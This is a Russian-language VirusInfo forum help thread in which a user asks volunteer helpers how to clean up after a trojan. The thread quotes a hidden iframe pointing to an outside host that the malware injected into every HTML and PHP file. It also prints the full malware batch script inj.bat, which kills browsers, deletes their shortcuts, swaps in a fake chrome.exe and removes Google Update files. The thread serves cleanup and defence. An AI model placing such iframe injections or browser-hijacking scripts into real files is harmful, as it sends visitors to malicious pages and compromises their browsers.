Показано с 1 по 19 из 19.

как удалить остатки трояна? (заявка № 130129)

  1. #1
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42

    как удалить остатки трояна?

    вчера комп поймал трояна. в каждум *.htm и *.php файле на компе была дописана строка
    "p
    <nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>
    "
    . антивирус нод32 нашел около 30000 таких страниц, но вылечить не смог. удалять эти страницы я не хочу, т.к. они нужны. снес нода, поставил касперского кристал. провел полную проверку системы. касперский нашел и удалил 9 троянове, но он эти страницы как вредоносные не помечает. но при каждом вызове страницы блокирует доступ компа к адресу из конца страницы. как избавиться от последствий? нужны ли вам протоколы авз и HijackThis?

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) Олег Морозов, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42

  5. #4
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    C:\Documents and Settings\User\Главное меню\Программы\Автозагрузка\WCLOCK32.EXE - Ваше?

    - Сделайте лог полного сканирования MBAM.


  6. #5
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    C:\Documents and Settings\User\Главное меню\Программы\Автозагрузка\WCLOCK32.EXE да, это моё. это часики. у меня щас делается сканирование малваребайтом. винт на терабайт, поэтому долгая песня. появилась еще одна проблема, смс вымогатель не пускает в интернет, на сайты связанные с безопасностью (касперский, доктор веб, вирусинфо и т.д.). как от него избавиться??? помогите

    в автозагрузке ничего подозрительного не нашел.

    - - - Добавлено - - -

    Вложение 397908 вот лог сканирования

    - - - Добавлено - - -

    к сожалению, надпись "ничего не удаляйте не посоветовавшись с хелперами" увиел только после того как удалил малваребайтом найденные объекты. не пинайте сильно

  7. #6
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Вы все удалили в MBAM?


  8. #7
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    не все. там отмечены файлы, относящиеся к навигации, их оставил

    - - - Добавлено - - -

    после 7-ми часов простоя компа изменился файл hosts. чо то бред какой то происходит

  9. #8
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406


  10. #9
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    вот пожалуйста
    Вложение 398046
    Вложение 398047

  11. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    C:\WINDOWS\tasks\At1.job - удалите.

    Больше ничего необычного.


  12. #11
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    а как быть с блокировкой доступа на сайты, посвященные безопасности? у меня при заходе на них вываливается всплывающее окно, в котором говорят отправить смс.... щас пишу вам с другого компа, т к исходный комп не ходит на этот сайт.
    и еще хотелось бы убрать то, о чем писалось в первом сообщении. может есть какой скриптик? чтоб перешерстил все файлы на компе и убрал из них строчки ?
    "p
    <nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>
    "
    просто на компе стоит фтп сервер, и при открытии консоли управления антивирь ругается, что я пытаюсь пройти по ссылкеtsm.25u.com/local.htm. а она вроде как небезопасна.
    Последний раз редактировалось Techno; 14.01.2013 в 21:57. Причина: ссылка

  13. #12
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    я тут давеча смотрел порты открытые и вот что заметил.
    Вложение 398065
    насколько я знаю надпись backdoor ничо хорошего не сулит.
    что посоветуете?

    - - - Добавлено - - -

    еще нарыл в логах rsit что в виндовской папке появилась папка upd. посмотрел ее содержимое и закрались подозрения что дело нечисто
    Вложение 398066
    и с хромом проблемы начались. не запускается. а вместо ярлыка на настоящий хром на рабочем столе появился ярлык на поддельный хром
    Файл inj.bat:

    Скрытый текст


    if exist zhopras.cpl (goto second) else goto first
    :first
    echo nahuy>zhopras.cpl
    goto inj

    :second
    if exist end.txt (goto udl) else goto scht

    :udl
    del /f /q end.txt
    copy /y desktop.dll counter.bat
    call counter.bat
    goto inj

    :scht
    call counter.bat
    goto exit

    :inj
    taskkill /f /im iexplore.exe /T
    start ie.vbs
    if exist "%ProgramFiles%\Opera\Opera.exe" (goto oper) else goto next
    :oper
    del /f /q /s "C:\Documents and Settings\Opera.lnk"
    del /f /q /s "d:\Documents and Settings\Opera.lnk"
    del /f /q /s "e:\Documents and Settings\Opera.lnk"
    del /f /q /s "f:\Documents and Settings\Opera.lnk"
    taskkill /f /im opera.exe /T
    start opera.vbs
    :next
    if exist "%ProgramFiles%\Mozilla Firefox\firefox.exe" (goto ffox) else goto next1
    :ffox
    del /f /q /s "C:\Documents and Settings\Mozilla Firefox.lnk"
    del /f /q /s "d:\Documents and Settings\Mozilla Firefox.lnk"
    del /f /q /s "e:\Documents and Settings\Mozilla Firefox.lnk"
    del /f /q /s "f:\Documents and Settings\Mozilla Firefox.lnk"
    taskkill /f /im firefox.exe /T
    start fire.vbs
    :next1

    taskkill /f /im chrome.exe /T

    for /f "tokens=*" %%i in ('dir /a:d /b "%userprofile%\.."') do (copy /y "chrome.exe" "%userprofile%\..\%%i\Local Settings\Application Data\Google\Chrome\Application\chrome.exe")


    taskkill /f /im GoogleUpdate.exe
    del /f /q /s "C:\Documents and Settings\GoogleUpdate.exe"
    del /f /q /s "%ProgramFiles%\Google\GoogleUpdate.exe"
    taskkill /f /im GoogleUpdateBroker.exe
    del /f /q /s "C:\Documents and Settings\GoogleUpdateBroker.exe"
    del /f /q /s "%ProgramFiles%\Google\GoogleUpdateBroker.exe"
    taskkill /f /im GoogleUpdateHelper.msi
    del /f /q /s "C:\Documents and Settings\GoogleUpdateHelper.msi"
    del /f /q /s "%ProgramFiles%\Google\GoogleUpdateHelper.msi"
    taskkill /f /im GoogleUpdateOnDemand.exe
    del /f /q /s "C:\Documents and Settings\GoogleUpdateOnDemand.exe"
    del /f /q /s "%ProgramFiles%\Google\GoogleUpdateOnDemand.exe"
    taskkill /f /im GoogleUpdateSetup.exe
    del /f /q /s "C:\Documents and Settings\GoogleUpdateSetup.exe"
    del /f /q /s "%ProgramFiles%\Google\GoogleUpdateSetup.exe"

    if exist "%ProgramFiles%\Google\Chrome\Application\chrome.exe" (goto chrom) else goto next2
    :chrom
    del /f /q /s "C:\Documents and Settings\Google Chrome.lnk"
    del /f /q /s "d:\Documents and Settings\Google Chrome.lnk"
    del /f /q /s "e:\Documents and Settings\Google Chrome.lnk"
    del /f /q /s "f:\Documents and Settings\Google Chrome.lnk"
    taskkill /f /im chrome.exe /T
    start chrome.vbs

    :next2
    if exist "%ProgramFiles%\Safari\Safari.EXE" (goto safar) else goto next3

    :safar
    del /f /q /s "C:\Documents and Settings\Safari.lnk"
    del /f /q /s "d:\Documents and Settings\Safari.lnk"
    del /f /q /s "e:\Documents and Settings\Safari.lnk"
    del /f /q /s "f:\Documents and Settings\Safari.lnk"
    taskkill /f /im safari.exe
    start safari.vbs
    :next3





    :exit
    Скрыть
    Последний раз редактировалось Techno; 14.01.2013 в 22:02. Причина: inj.bat

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    ie.vbs - а такие файлы есть?

    - Сделайте лог ComboFix.


  15. #14
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    ie.vbs таких файлов не нашел

    лог комбофикса Вложение 398173

  16. #15
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Изменения есть?

    192.168.0.1 - роутер? Проверяйте настройки на предмет вредоносных DNS?


  17. #16
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    ну в общем и целом пока все логи делал, сам же их и читал. местами замечал всякие подозрительности. чо то сам удалил, чо то программы удалили. осталось поправить все мои *.htm файлы, чтоб ту самую ссылку из них удалить. подскажите отимальный вариант исправления файлов? может скрипт какой подскажете или программу?

    192,168,0,1 это роутер

    а где копать насчет подозрительных днс? в настройках роутера?

  18. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    Цитата Сообщение от Олег Морозов Посмотреть сообщение
    а где копать насчет подозрительных днс? в настройках роутера?
    Да.

    - Удалите ComboFix.


  19. Это понравилось:


  20. #18
    Junior Member (OID) Репутация
    Регистрация
    06.12.2012
    Адрес
    Кемерово
    Сообщений
    46
    Вес репутации
    42
    в настройках роутера только 1 dns нашел - тот который мне выдал провайдер (dns сервер)

  21. #19
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,965
    Вес репутации
    406
    В логах больше ничего необычного.


  22. Это понравилось:


  • Уважаемый(ая) Олег Морозов, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Подозрение на остатки трояна.
      От mouse в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 24.07.2011, 21:43
    2. Помогите удалить остатки трояна
      От КульМан в разделе Помогите!
      Ответов: 26
      Последнее сообщение: 03.04.2010, 14:20
    3. остатки трояна на компе
      От gufy426 в разделе Помогите!
      Ответов: 18
      Последнее сообщение: 28.03.2010, 22:45
    4. Остатки sms-ного трояна
      От LynxRufus в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 13.02.2010, 14:42
    5. После трояна остатки...
      От truexcolors в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 30.01.2010, 02:47

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00641 seconds with 19 queries